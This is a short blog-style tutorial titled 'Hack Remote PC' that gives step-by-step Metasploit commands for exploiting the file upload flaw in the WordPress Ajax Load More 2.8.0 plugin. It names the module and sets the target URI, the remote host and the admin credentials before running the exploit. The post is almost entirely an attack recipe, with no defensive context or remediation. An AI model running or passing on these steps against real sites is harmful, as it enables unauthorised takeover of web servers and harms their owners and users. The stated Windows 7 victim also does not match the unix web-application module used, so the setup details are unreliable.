Hack Remote PC using Wordpress Ajax Load More PHP Upload Vulnerability


Exploit Targets
WordPress Ajax Load More 2.8.0

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_ajax­­­­­_load_more_file_upload
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set targeturi wordpress
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_username admin
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_password admin123
msf exploit (wp_ajax­­­­­_load_more_file_upload)>exploit     

0 comments:

Post a Comment